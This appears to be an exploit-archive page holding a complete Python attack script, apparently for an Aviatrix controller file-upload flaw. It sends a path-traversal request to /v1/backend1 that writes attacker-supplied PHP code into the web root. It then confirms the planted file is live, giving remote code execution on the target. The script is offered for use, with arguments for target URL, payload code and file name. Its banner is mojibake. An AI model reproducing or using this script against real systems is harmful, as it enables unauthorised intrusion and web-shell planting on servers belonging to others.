Share
## https://sploitus.com/exploit?id=1337DAY-ID-36888
#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""

โ–‘โ–ˆโ–€โ–€โ–ˆ โ–‘โ–ˆโ”€โ”€โ–‘โ–ˆ โ–‘โ–ˆโ–€โ–€โ–€ โ”€โ”€ โ–ˆโ–€โ–ˆ โ–ˆโ–€โ–€โ–ˆ โ–ˆโ–€โ–ˆ โ–„โ–ˆโ”€ โ”€โ”€ โ”€โ–ˆโ–€โ–ˆโ”€ โ–ˆโ–€โ–€โ–ˆ โ–„โ–€โ–€โ–„ โ–„โ–€โ–€โ–„ โ–ˆโ–€โ–€โ–ˆ
โ–‘โ–ˆโ”€โ”€โ”€ โ”€โ–‘โ–ˆโ–‘โ–ˆโ”€ โ–‘โ–ˆโ–€โ–€โ–€ โ–€โ–€ โ”€โ–„โ–€ โ–ˆโ–„โ–€โ–ˆ โ”€โ–„โ–€ โ”€โ–ˆโ”€ โ–€โ–€ โ–ˆโ–„โ–„โ–ˆโ–„ โ–ˆโ–„โ–€โ–ˆ โ–„โ–€โ–€โ–„ โ–ˆโ–„โ–„โ”€ โ–ˆโ–„โ–€โ–ˆ
โ–‘โ–ˆโ–„โ–„โ–ˆ โ”€โ”€โ–€โ–„โ–€โ”€ โ–‘โ–ˆโ–„โ–„โ–„ โ”€โ”€ โ–ˆโ–„โ–„ โ–ˆโ–„โ–„โ–ˆ โ–ˆโ–„โ–„ โ–„โ–ˆโ–„ โ”€โ”€ โ”€โ”€โ”€โ–ˆโ”€ โ–ˆโ–„โ–„โ–ˆ โ–€โ–„โ–„โ–€ โ–€โ–„โ–„โ–€ โ–ˆโ–„โ–„โ–ˆ
                            Author : 0xJoyGhosh
                            Org    : System00 Security
                            Twitter: @0xjoyghosh

""")
try:
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
    parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)
    parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)
    args = parser.parse_args()
    url =f"{args.url}/v1/backend1"
except TypeError:
    print("Type -h To See all the options")
except():
    exit()
def exploit(url,path,code):
    headers = CaseInsensitiveDict()
    headers["Content-Type"] = "application/x-www-form-urlencoded"
    data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'
    resp = requests.post(url, headers=headers, data=data,verify=False)
    stat = requests.get(f"{args.url}/v1/{path}",verify=False)
    if resp.status_code==200:
        if stat.status_code==200:
            print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")
            print("")
        else:
            print("[ Exploit successful Creating File Failed ]")
            pass
    else:
        print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')

if args.url is not None:
    if args.code is not None:
        if args.name is not None:
            exploit(url,args.name,args.code)
        else:
            print('Type -h to see help Menu')
    else:
        print('Type -h to see help Menu')
else:
    print('Type -h to see help Menu')

#  0day.today [2021-10-16]  #